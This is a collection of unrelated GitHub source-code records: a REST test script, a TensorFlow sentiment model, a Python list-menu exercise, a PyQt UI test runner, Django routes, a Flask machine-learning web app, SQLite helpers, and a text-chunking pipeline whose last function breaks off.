{\"likes\": 34, \"name\":\"Brian\", \"views\": 1003},\n {\"likes\": 12, \"name\":\"Karen\", \"views\": 10410},\n {\"likes\": 12424, \"name\":\"How to make REST APIs\", \"views\": 1051160}]\n\nfor i in range(len(data)):\n response = requests.put(BASE_URL + \"video/\" + str(i), data[i])\n print(response.json())\n\n\ninput()\nresponse = requests.get(BASE_URL + 'video/6')\nprint(response.json())\n'''\n\nresponse = requests.patch(BASE_URL+\"video/2\", {\"views\": 99, \"likes\": 1})\nprint(response.json())","repo_name":"JoaoFula/RestAPI","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4960678055","text":"import tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom utils import Vocablury\nimport utils\nimport datetime\nimport os\nimport numpy as np\n\n\nclass SentimentAnalyzer(object):\n def __init__(self,\n # embedding_dim: int = 100,\n rnn_unit: int = 128):\n super().__init__()\n self.vocab = Vocablury(\n load_prefix=\"sherlock\")\n self.model = tf.keras.Sequential([\n tf.keras.layers.Embedding(\n input_dim=len(self.vocab),\n output_dim=rnn_unit,\n mask_zero=True\n # output_dim=embedding_dim\n ),\n tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(units=rnn_unit, return_sequences=True)\n ),\n tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(units=rnn_unit)\n ),\n tf.keras.layers.Dense(units=rnn_unit, activation=\"relu\"),\n tf.keras.layers.Dropout(rate=0.5),\n tf.keras.layers.Dense(units=1)\n ])\n\n def prepare_dataset(self):\n builder = tfds.builder(\"imdb_reviews\")\n\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n\n self.train: tf.data.Dataset = datasets[\"train\"]\n self.test: tf.data.Dataset = datasets[\"test\"]\n\n def prepare_for_training(self,\n training_size: int = 80000,\n batch_size: int = 64,\n buffer_size: int = 10000\n ):\n # convert to indexes\n # for x in self.train.take(1):\n # print(x)\n self.training = self.train.map(utils.sentence_spliter_map_fn)\n self.training = self.training.flat_map(\n lambda text_list, label_list: tf.data.Dataset.zip(\n (\n 
tf.data.Dataset.from_tensor_slices(text_list),\n                    tf.data.Dataset.from_tensor_slices(label_list)\n                )\n            )\n        )\n        self.training = self.training.shuffle(buffer_size=buffer_size)\n\n        for x, y in self.training.take(20):\n            print(x)\n            print(y)\n            print()\n        self.training = self.training.map(self.vocab.encode_map_fn)\n\n        # size = self.training.reduce(np.int64(0), lambda x, _: x+1).numpy()\n        # print(size, flush=True)\n\n        # split into training and validation sets\n        self.validation = self.training.skip(training_size)\n        self.training = self.training.take(training_size)\n\n        self.training = self.training.padded_batch(\n            batch_size=batch_size, drop_remainder=True)\n        self.validation = self.validation.padded_batch(\n            batch_size=batch_size, drop_remainder=True)\n\n    def __call__(self, text):\n        encoded_text = self.vocab.encode(tf.constant(text))\n        return self.model(tf.expand_dims(encoded_text, 0))\n\n    def train_model(self, epochs: int = 10):\n        log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n        tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n\n        bce = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n        self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-4),\n                           loss=bce,\n                           metrics=[\"accuracy\"])\n        print(self.model.summary())\n\n        # Directory where the checkpoints will be saved\n        checkpoint_dir = \"./model/training_checkpoints\"\n        # Name of the checkpoint files\n        checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\n        checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n            filepath=checkpoint_prefix,\n            save_weights_only=True)\n\n        history = self.model.fit(self.training,\n                                 epochs=epochs,\n                                 callbacks=[\n                                     checkpoint_callback, tensorboard_callback],\n                                 validation_data=self.validation)\n\n    def load(self, path_to_model: str = \"./model/training_checkpoints\"):\n        # restore the most recent checkpoint written by train_model\n        self.model.load_weights(tf.train.latest_checkpoint(path_to_model))\n","repo_name":"sageprogrammer/imdb-reviews-test","sub_path":"SentimentAnalyzer.py","file_name":"SentimentAnalyzer.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"6349309781","text":"menu_item = 0\r\nnamebarang =[]\r\nwhile menu_item != 8 :\r\n    print(\".....\")\r\n    print(\"1. print the list\")\r\n    print(\"2. add an item name to the list\")\r\n    print(\"3. delete an item name from the list\")\r\n    print(\"4. change an item name in the list\")\r\n    print(\"5. display the data in the list\")\r\n    print(\"6. check the data in the list\")\r\n    print(\"7. find an index\")\r\n    print(\"8. exit\")\r\n
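    # read the user's choice and dispatch to the matching action\r\n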
keluar\")\r\n menu_item = int(input(\"pilih menu:\"))\r\n if menu_item == 1 :\r\n barang = 0\r\n if len (namebarang) > 0 :\r\n while barang < len(namebarang[barang]):\r\n print(barang,\".\",namebarang[barang])\r\n barang =barang = 1\r\n else :\r\n print(\"kosong:\")\r\n elif menu_item == 2 :\r\n name = input(\"masukkan nama :\")\r\n namebarang.append(name)\r\n print(namebarang)\r\n elif menu_item == 3 :\r\n del_name = input(\"nama barang yang ingin dihapus :\")\r\n if del_name in namebarang :\r\n item_number = namebarang.index(del_name)\r\n del namebarang[item_number]\r\n print(namebarang)\r\n else :\r\n print(del_name,\"tidak ditemukan\")\r\n elif menu_item == 4 :\r\n name = input(\"nama barang yang ingin di ubah :\")\r\n if name in namebarang :\r\n item_number = namebarang.index(name)\r\n new_name = input(\"nama baru :\")\r\n namebarang[item_number]= new_name\r\n print(namebarang)\r\n else :\r\n print(name,\"tidak ditemukan\")\r\n elif menu_item == 5 :\r\n print(namebarang)\r\n elif menu_item == 6 :\r\n barang_yang_dicari = input(\"masukkan barang yang dicari :\")\r\n if barang_yang_dicari in namebarang :\r\n print(\"barang ini terdapat pada namebarang\")\r\n elif barang_yang_dicari not in namebarang :\r\n print(\"barang ini tidak terdapat pada namebarang\")\r\n elif menu_item == 7 :\r\n print(namebarang)\r\n barang_yang_dicari = input(\"masukkan barang dicari:\")\r\n print(barang_yang_dicari, \"berada pada index\",(barang_yang_dicari))\r\n\r\nprint(\"selamat tinggal\")\r\n \r\n","repo_name":"idamusdalifah/G_D0221358_IDA_MUSDALIFAH_ASD","sub_path":"kasus list ida musdalifah.py","file_name":"kasus list ida musdalifah.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39478486458","text":"import os\nimport sys\nimport glob\nimport webbrowser\nimport unittest\nimport PyQt5.Qt as Qt\nimport PyQt5.QtGui as QtGui\nfrom PyQt5.QtWidgets import QApplication\nimport test.HTMLTestRunner\nimport test.ui.frmTreeViewUITest as frmTreeViewUITest\n\n\nclass UserInterfaceTest(unittest.TestCase):\n def __init__(self):\n unittest.TestCase.__init__(self)\n self.file = \"\"\n\n def set_file(self, file_name):\n self.file = file_name\n # self.__name__ = file_name\n\n def get_file(self):\n return self.file\n\n def runTest(self):\n\n list_tests = []\n list_actions = []\n num_actions = []\n test_num = 0\n\n with open(self.file, 'r') as myfile:\n list_items = myfile.read().split(\"\\n\")\n for a_line in list_items:\n # Test title line denoted with #\n if a_line.startswith('#'):\n list_tests.append(a_line[1:].strip().replace('\\n',' '))\n test_num = len(list_tests)\n num_actions.append(0)\n\n # Individual actions within a test\n elif a_line:\n list_actions.append(a_line)\n\n # If the first line is not a title starting with #, use the file name as test name\n if test_num == 0:\n test_num = 1\n prefix, extension = os.path.splitext(str(self.file))\n list_tests.append(prefix)\n num_actions.append(0)\n num_actions[test_num-1] += 1\n\n # Create a tree widget\n frm = frmTreeViewUITest.frmTreeViewUITest()\n\n # Set title\n frm.setWindowTitle('UI Tests, check if passed: '+str(self.file))\n\n # Populate the tree list with list_tests (as parent), list_actions(as children)\n frm.set_tree(list_tests, list_actions, num_actions)\n\n # Execute the form\n frm.exec_()\n\n if not frm.OK:\n self.skipTest(\"User Skipped\")\n else:\n failed = []\n\n # Evaluating the status of parents and Children\n num_tests = 
frm.tree.topLevelItemCount()\n\n for i in range(num_tests):\n test_ = frm.tree.topLevelItem(i)\n test_state = test_.checkState(0) # 0-not checked, 1-checked in child, 2-all\n n_actions = test_.childCount()\n\n if test_state == 0:\n failed.append('\\nUI test failed: '+ str(test_.text(0)))\n\n elif test_state == 1:\n failed.append('\\nUI test failed: ' + str(test_.text(0)))\n for j in range(n_actions):\n action = test_.child(j)\n action_state = action.checkState(0)\n if action_state == 0:\n failed.append('Action: ' + str(action.text(0)))\n\n if failed:\n tester_notes = ''\n if frm.notes:\n tester_notes = frm.notes.toPlainText()\n self.fail(str(len(failed)) +\n \" steps failed in \" +\n self.file + ':\\n' +\n '\\n'.join(failed)+\n '\\n'+ tester_notes)\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n app = QApplication(sys.argv)\n\n my_suite = unittest.TestSuite()\n\n for test_file in glob.glob(\"*.txt\"):\n make_test = UserInterfaceTest()\n make_test.set_file(test_file)\n my_suite.addTest(make_test)\n\n # test_file = 'SWMM_UI_Testing.txt'\n # make_test = UserInterfaceTest()\n # make_test.set_file(test_file)\n # my_suite.addTest(make_test)\n\n report_filename = \"test_results_ui.html\"\n fp = open(report_filename, 'wb')\n runner = test.HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title='SWMM-EPANET UI Test Report',\n description='User Interface Test Results')\n\n runner.run(my_suite)\n fp.close()\n try:\n webbrowser.open_new_tab(report_filename)\n except:\n print(\"Test results written to \" + report_filename)\n\n sys.exit(app.exec_())\n\n","repo_name":"USEPA/SWMM-EPANET_User_Interface","sub_path":"test/ui/test_gui_swmm.py","file_name":"test_gui_swmm.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"29"} +{"seq_id":"38384732289","text":"from django.conf.urls import url\nfrom . 
import views\nfrom .feed import ArticleFeed\n\napp_name = \"myblog\"\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    url(r'^single/([0-9]+)/$', views.single, name='single'),\n    url(r'^category/([0-9]+)/$', views.category, name='category'),\n    url(r'^tags/([0-9]+)/$', views.tags, name='tags'),\n    url(r'^filetime/(.*?)/(.*?)/$', views.filetime, name='filetime'),\n    url(r'^comment/(.*?)/$', views.comment, name='comment'),\n    url(r'^rss/$', ArticleFeed(), name='rss'),\n]","repo_name":"dalao-B/PY1901Django","sub_path":"blog/myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"16489450393","text":"from flask import Flask, request, render_template\nimport pickle\nimport json\nimport os\nimport numpy\nimport pandas as pd\nimport csv\n\n\napp=Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n\n@app.route('/about')\ndef about():\n\treturn render_template(\"about.html\")\n\n@app.route(\"/loan\",methods=[\"GET\",\"POST\"])\ndef loan():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"loan_s_p.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tai=float(request.form['ai'])\n\t\t\tci=float(request.form['ci'])\n\t\t\tlamt=float(request.form['lamt'])\n\t\t\tch=float(request.form['ch'])\n\t\t\tdata=[ai,ci,lamt,ch]\n\t\t\tprint(data)\n\t\t\tmarried=request.form['married']\n\t\t\tif married==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tdependents=request.form['dependents']\n\t\t\tif dependents == \"Zero dependents\":\n\t\t\t\tdata.extend([1,0,0,0])\n\t\t\telif dependents == \"One dependent\":\n\t\t\t\tdata.extend([0,1,0,0])\n\t\t\telif dependents == \"Two dependents\":\n\t\t\t\tdata.extend([0,0,1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,0,0,1])\n\n\t\t\t# form values arrive as strings, so cast before the numeric comparison\n\t\t\teducation=int(request.form['education'])\n\t\t\tif education == 1:\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tselfemp=int(request.form['selfemp'])\n\t\t\tif selfemp == 1:\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tproparea=request.form['proparea']\n\t\t\tif proparea == \"Rural\":\n\t\t\t\tdata.extend([1,0,0])\n\t\t\telif proparea == \"SemiUrban\":\n\t\t\t\tdata.extend([0,1,0])\n\t\t\telif proparea == \"Urban\":\n\t\t\t\tdata.extend([0,0,1])\n\n\t\t\tprint(data)\n\n\t\t\tans=model.predict([data])\n\t\t\tif ans==\"Y\":\n\t\t\t\tmsg='We are pleased to inform you that your loan is approved'\n\t\t\telse:\n\t\t\t\tmsg='Sorry, your loan is rejected'\n\t\t\treturn render_template(\"loan.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\t\t\treturn render_template(\"loan.html\")\n\telse:\n\t\treturn render_template(\"loan.html\")\n\n@app.route(\"/churn\", methods=[\"GET\", \"POST\"])\ndef churn():\n\tif request.method == \"POST\":\n\t\tf = None\n\t\tmodel = None\n\t\ttry:\n\t\t\tf=open(\"re.model\", \"rb\")\n\t\t\tmodel = pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\", e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\t\tif model is not None:\n
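\t\t\t# collect the six numeric churn features first; the categorical answers are one-hot encoded below\n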
\t\t\tn1 = float(request.form[\"n1\"])\n\t\t\tn2 = float(request.form[\"n2\"])\n\t\t\tn3 = float(request.form[\"n3\"])\n\t\t\tn4 = float(request.form[\"n4\"])\n\t\t\tn5 = float(request.form[\"n5\"])\n\t\t\tn6 = int(request.form[\"n6\"])\n\t\t\tdata=[n1,n2,n3,n4,n5,n6]\n\t\t\tprint(data)\n\t\t\tn7=request.form[\"myselect\"]\n\t\t\tif n7==\"Yes\":\n\t\t\t\tdata.extend([1])\n\t\t\telse:\n\t\t\t\tdata.extend([0])\n\t\t\tn8=request.form[\"myselect1\"]\n\t\t\tif n8==\"Male\":\n\t\t\t\tdata.extend([0,1])\n\t\t\telse:\n\t\t\t\tdata.extend([1,0])\n\n\t\t\tprint(data)\n\n\t\t\tans=model.predict([data])\n\t\t\tif ans=='1':\n\t\t\t\tmsg=\"CHURNED\"\n\t\t\telse:\n\t\t\t\tmsg=\"NOT CHURNED\"\n\t\t\tmsg=\"Customer has: \" + msg\n\t\t\treturn render_template(\"churn.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\t\t\treturn render_template(\"churn.html\")\n\n\telse:\n\t\treturn render_template(\"churn.html\")\n\n\n\n@app.route(\"/credit\",methods=[\"GET\",\"POST\"])\n\ndef credit():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"CreditCard.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tn1=float(request.form[\"n1\"])\n\t\t\tn2=float(request.form[\"n2\"])\n\t\t\tn3=float(request.form[\"n3\"])\n\t\t\tn4=float(request.form[\"n4\"])\n\t\t\tn5=float(request.form[\"n5\"])\n\t\t\tn6=float(request.form[\"n6\"])\n\t\t\tdata=[n1,n2,n3,n4,n5,n6]\n\t\t\tprint(data)\n\t\t\tn7=request.form[\"myselect\"]\n\t\t\tif n7==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tn8=request.form[\"myselect1\"]\n\n\t\t\tif n8==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\t\t\tprint(data)\n\n\t\t\tans=model.predict([data])\n\t\t\tif ans=='N':\n\t\t\t\tmsg=\"Legitimate Transaction\"\n\t\t\telse:\n\t\t\t\tmsg=\"Fraudulent Transaction\"\n\t\t\tmsg=\"Transaction is: \" + msg\n\t\t\treturn render_template(\"credit.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\telse:\n\t\treturn render_template(\"credit.html\")\n\n\n\n@app.route(\"/creditcsv\",methods=[\"GET\",\"POST\"])\n\n\ndef creditcsv():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"Creditcardcsv.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tup_data = request.files.get('file')\n\t\t\tdata = []\n\t\t\tmessages = []\n\t\t\ti=0\n\t\t\tif up_data:\n\t\t\t\tfor row in up_data:\n\t\t\t\t\tvalues = row.decode().strip().split(\",\")\n\t\t\t\t\trow_data = [float(val) for val in values]\n\t\t\t\t\ti=i+1\n\t\t\t\t\tdata.append(row_data)\n\t\t\t\t\tpred = model.predict([row_data])\n\t\t\t\t\tprint(pred)\n\t\t\t\t\tif pred == 0:\n\t\t\t\t\t\tmsg = \"Legitimate Transaction\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = \"Fraudulent Transaction\"\n\t\t\t\t\t#msg = \" Legitimate Transaction \" if pred == '0' else \" Fraudulent Transaction\"\n\t\t\t\t\tmessages.append(str(i) + \"] Transaction is: \" + msg + \"<br>\")\n
    \")\n\t\t\treturn render_template(\"creditcsv.html\", msg='\\n'.join(messages))\n\t\telse:\n\t\t\tprint(\"Model issue\")\n\t\t\treturn render_template(\"creditcsv.html\", msg=\"Model issue\")\n\telse:\n\t\treturn render_template(\"creditcsv.html\")\n\t\t\t\n\n\n\nif __name__ == \"__main__\" :\n\tapp.run(debug=False,host='0.0.0.0',use_reloader=True)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akshata1710/financial-machine-learning-flask-website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"131019700","text":"import pandas as pd\nimport numpy as np\nimport sqlite3 as sql\n\ndef get_infos_risco(id_grupo):\n lista = []\n conn = sql.connect('Bases/Banco_dados_att.db')\n filtro = (f'SELECT CNPJ_CABECA, NM_SEGMENTO_RISCO_GRUPO, ID_SEGMENTO_RISCO_CABECA FROM IDGRUPO_SEGTO_RISCO WHERE ID_GRUPO = \"{id_grupo}\"')\n resp = pd.read_sql(filtro, conn)\n cnpj = str(resp.values[0][0])\n segto_risco = resp.values[0][1]\n id_segto_risco = resp.values[0][2]\n return {\"cnpj\": cnpj, \"segmento_risco\": segto_risco, \"id_segto_risco\":id_segto_risco}\n\ndef get_parametros_volatilidade(id_grupo):\n lista = []\n conn = sql.connect('Bases/Banco_dados_att.db')\n filtro_vol = (f'SELECT ds_volatilidade, id_volatilidade, id_grupo FROM parametros_estrategia_portfolio WHERE id_grupo = \"{id_grupo}\"')\n resp_vol = pd.read_sql(filtro_vol, conn)\n vol = str(resp_vol.values[0][0])\n id_vol = resp_vol.values[0][1]\n id_grupo = resp_vol.values[0][2]\n return {\"id_grupo\": id_grupo, \"ds_volatilidade\": vol, \"id_volatilidade\":id_vol}\n","repo_name":"caiobiondo/motor-iraroc","sub_path":"Abas/Aba_risco.py","file_name":"Aba_risco.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73791359117","text":"import json\nimport os\nimport pickle\nimport re\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Optional, Set\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pydash\nimport streamlit as st\nfrom config import config\n# from langchain.embeddings import VertexAIEmbeddings\nfrom langchain.schema.embeddings import Embeddings\nfrom langchain.text_splitter import (CharacterTextSplitter,\n RecursiveCharacterTextSplitter)\nfrom networkx.algorithms import community\nfrom scipy.spatial.distance import cosine\nfrom utilities.custom_logger import CustomLogger\n\nlogger = CustomLogger()\n\n\n@dataclass\nclass ProcessingPipeline:\n embeddings: Embeddings\n total_num_of_tokens: Optional[int] = None\n\n def process_document(self, document: str) -> List[str]:\n \"\"\"process a long document into list of shorter chunks, where each chunk has a unique topic\n\n Args:\n document (str): long text\n\n Returns:\n List[str]: list of chunks\n \"\"\"\n # remove sub-headers\n document = \"\\n\\n\".join([p if self.is_paragraph(p) else \"\\n\\n\" for p in document.split(\"\\n\\n\")])\n\n self.total_num_of_tokens = self.get_num_of_tokens(document)\n\n # split documents into chunks based on its original paragraphing\n chunks = [ch for ch in re.split(r\"[\\n]{3,}\", document) if len(ch) > 0]\n chunks = [config.remove_index(chunk, \"[\\\\n]{2,}\", \"(\\\\d+ *)\", \"\\n\\n\") for chunk in chunks]\n\n # ensure No. 
        # ensure the number of tokens in each chunk stays below the max context window\n        chunks_require_split = list()\n        for i, chunk in enumerate(chunks):\n            chunk_len = self.get_num_of_tokens(chunk)\n            logger.info(f\"number of tokens for {i}th chunk is: {chunk_len}\")\n            if chunk_len > config.CHUNK_SIZE:\n                chunks_require_split.append(i)\n\n        if len(chunks_require_split) == 0:\n            return chunks\n\n        logger.info(f\"long chunks that require splitting: {chunks_require_split}\")\n\n        apply_clustering = True\n\n        selected_chunks = []\n        for i, chunk in enumerate(chunks):\n            if i not in chunks_require_split:\n                # short chunks are kept as they are\n                selected_chunks.append(chunk)\n                continue\n            if not apply_clustering:\n                text_splitter = CharacterTextSplitter().\\\n                    from_huggingface_tokenizer(\n                        config.TOKENIZER,\n                        chunk_size=config.CHUNK_SIZE // 2,\n                        chunk_overlap=0,\n                        separator=\"\\n\\n\",\n                        keep_separator=True\n                    )\n                logger.info(f\"partition the {i}th chunk due to large size:\")\n                splits = text_splitter.split_text(chunk)\n                logger.info(f\"partitioned long chunk into {len(splits)} sub-chunks\")\n                selected_chunks.extend(splits)\n            else:\n                logger.info(f\"partition the {i}th chunk due to large size:\")\n                segments = chunk.split(\"\\n\\n\")\n                if len(segments) <= 2:\n                    if len(segments) < 2:\n                        raise Exception(f\"paragraph - {i} is too long and cannot be split\")\n                    selected_chunks.extend(segments)\n                else:\n                    selected_chunks.extend(self.partition_segments(segments))\n                logger.info(f\"partition for the {i}th chunk is completed\")\n\n        chunks = selected_chunks\n\n        length_max = max([self.get_num_of_tokens(ch) for ch in chunks])\n        length_min = min([self.get_num_of_tokens(ch) for ch in chunks])\n\n        logger.info(f\"After splitting by paragraph:\\ntotal No. of chunks: {len(chunks)}, max length: {length_max}, min length: {length_min}\")\n\n        return chunks\n\n    @staticmethod\n    def get_num_of_tokens(text: str) -> int:\n        \"\"\"get the number of tokens in the text\"\"\"\n        return len(config.TOKENIZER.tokenize(text))\n\n    def is_paragraph(self, txt):\n        \"\"\"filter out short sub-header lines that do not start with a numeric index\"\"\"\n        if (re.match(r\"^[0-9]+ \", txt) is None) and (self.get_num_of_tokens(txt) < 20):\n            return False\n        else:\n            return True\n\n    def partition_segments(self, segments: List[str]) -> List[str]:\n        \"\"\"To partition a large chunk, we first split the chunk into paragraphs; each paragraph is called a segment here.\n        Then we follow the algorithm below:\n        1. search for any segment with length > config.CHUNK_SIZE\n        2. consider the long segments as the original splitting points\n        3. aggregate the rest of the segments by text embedding and the Louvain\n        community detection algorithm\n        4. return partitions with texts\n\n        Args:\n            segments (List[str]): list of paragraphs\n\n        Returns:\n            List[str]: list of texts with length < config.CHUNK_SIZE\n        \"\"\"\n
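        # illustrative example (hypothetical sizes): given segments [s0, s1, LONG, s3],\n        # the long segment becomes its own partition while [s0, s1] and [s3] are\n        # grouped around it by embedding similarity\n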
        long = []\n        for i, sub in enumerate(segments):\n            sub_len = self.get_num_of_tokens(sub)\n            logger.info(f\"length of {i}th sub-chunk is {sub_len}\")\n            if sub_len > config.CHUNK_SIZE:\n                # TODO:\n                pass\n            elif sub_len > config.CHUNK_SIZE * config.SPLIT_RATIO:\n                long.append(i)\n\n        def group_similar_segments(segments: List[str]) -> List[Set[int]]:\n            embedding_dict = self.get_embeddings(segments)\n            return self.cluster_similar_chunks(embedding_dict)\n\n        chunks = list()\n        if len(long) == 0:\n            clusters = group_similar_segments(segments)\n            for idx, clu in enumerate(clusters):\n                chunk = \"\\n\\n\".join([segments[i] for i in clu])\n                logger.info(f\"after partitioning, the length of {idx}th sub-chunk is {self.get_num_of_tokens(chunk)}\")\n                chunks.append(chunk)\n            return chunks\n\n        res = list()  # create a list to contain partitions\n        segs = set()  # create a set to contain the elements of a cluster\n        for i in range(len(segments)):\n            if i in long:\n                # flush the previous cluster, if any, before the long segment\n                if segs:\n                    start = min(segs)\n                    end = max(segs) + 1\n                    clusters_ = group_similar_segments(segments[start:end])\n                    clusters = list()\n                    ori = range(start, end)\n                    for clu in clusters_:\n                        clusters.append([ori[j] for j in clu])\n                    res.extend(clusters)\n                    # reset segs\n                    segs = set()\n\n                # add the long segment as its own singleton partition\n                res.append([i])\n            else:\n                segs.add(i)\n\n        if len(segs) != 0:\n            start = min(segs)\n            end = max(segs) + 1\n            clusters_ = group_similar_segments(segments[start:end])\n            # map local cluster indexes back to the original segment positions\n            clusters = list()\n            ori = range(start, end)\n            for clu in clusters_:\n                clusters.append([ori[j] for j in clu])\n            res.extend(clusters)\n\n        # map indexes back to texts\n        for idx, clu in enumerate(res):\n            chunk = \"\\n\\n\".join([segments[i] for i in clu])\n            logger.info(f\"after partitioning, the length of {idx}th sub-chunk is {self.get_num_of_tokens(chunk)}\")\n            chunks.append(chunk)\n\n        return chunks\n\n    def get_embeddings(self, paragraphs: List[str]) -> Dict[str, Dict]:\n        \"\"\"embeddings for each paragraph.\n        The API accepts a maximum of 3,072 input tokens and outputs 768-dimensional vector embeddings.\n        Use the following parameters for the text embeddings model textembedding-gecko (it belongs to the PaLM model family).\n\n        Args:\n            paragraphs (List[str]): texts\n\n        Returns:\n            Dict[str, Dict]: embeddings\n        \"\"\"\n\n        embedding_dict = dict()\n        for idx, para in enumerate(paragraphs):\n            sen_embedding = self.embeddings.embed_query(para)\n\n            embedding_dict[str(idx)] = {\n                \"text\": para,\n                \"embedding\": sen_embedding\n            }\n
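        # resulting structure, e.g. {\"0\": {\"text\": \"first paragraph ...\", \"embedding\": [0.12, ...]}, ...}\n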
        logger.info(\"embedding completed\")\n        # with open(config.OUT_PATH / \"embedding_paragraph.json\", \"w\") as f:\n        #     json.dump(embedding_dict, f, indent=2)\n\n        # load embeddings and get the similarity matrix for assessment\n        # with open(config.OUT_PATH / \"embedding_paragraph.json\", \"r\") as f:\n        #     embedding_dict = json.load(f)\n\n        return embedding_dict\n\n    def cluster_similar_chunks(self, embedding_dict: Dict[str, Dict]) -> List[Set[int]]:\n        \"\"\"\n        cluster chunks together when they share a similar semantic meaning\n\n        Args:\n            embedding_dict (Dict[str, Dict]): embeddings\n\n        Returns:\n            List[Set[int]]: list of chunk index sets, one per cluster\n        \"\"\"\n        # pairwise cosine similarity matrix between the paragraph embeddings\n        summary_similarity_matrix = np.zeros((len(embedding_dict), len(embedding_dict)))\n        summary_similarity_matrix[:] = np.nan\n\n        for row in range(len(embedding_dict)):\n            for col in range(row, len(embedding_dict)):\n                # Calculate cosine similarity between the two vectors\n                similarity = 1 - cosine(embedding_dict[str(row)][\"embedding\"], embedding_dict[str(col)][\"embedding\"])\n                summary_similarity_matrix[row, col] = similarity\n                summary_similarity_matrix[col, row] = similarity\n\n        plt.figure()\n        plt.imshow(summary_similarity_matrix, cmap='Blues')\n        plt.savefig(config.OUT_PATH / \"similarity_matrix_paragraph.jpg\")\n\n        partitions = self.get_topics(\n            [t[\"text\"] for t in embedding_dict.values()],\n            summary_similarity_matrix,\n            bonus_constant=0.2)\n\n        # with open(config.OUT_PATH / \"chunks\", \"wb\") as fp:\n        #     pickle.dump(chunks, fp)\n\n        return partitions\n\n    def get_topics(self,\n                   texts: List[str],\n                   similarity_matrix: np.ndarray,\n                   bonus_constant: float = 0.25) -> List[Set[int]]:\n        \"\"\"group chunks into topic clusters with the Louvain community detection algorithm\n\n        Args:\n            texts (List[str]): chunk texts, used to check cluster token counts\n            similarity_matrix (np.ndarray): cosine similarity between chunks\n            bonus_constant (float, optional): Defaults to 0.25. This adds an additional similarity score\n            to the embeddings' cosine similarity if the two sentences are near each other. The purpose is to encourage contiguous clustering.\n\n        Returns:\n            List[Set[int]]: list of chunk index sets, one per topic\n        \"\"\"\n        proximity_bonus_arr = np.zeros_like(similarity_matrix)\n        for row in range(proximity_bonus_arr.shape[0]):\n            for col in range(proximity_bonus_arr.shape[1]):\n                if row == col:\n                    proximity_bonus_arr[row, col] = 1\n                else:\n                    proximity_bonus_arr[row, col] = 1/(abs(row-col)) * bonus_constant\n\n        similarity_matrix += proximity_bonus_arr\n\n        similarity_matrix = nx.from_numpy_array(similarity_matrix)\n\n        # Store the accepted partitionings\n        resolution = 0.01  # a higher resolution favours smaller communities\n        resolution_step = 0.001\n        partitions = []\n\n        def is_partition_correct(partitions: List[Set], texts: List[str], thresh: int) -> 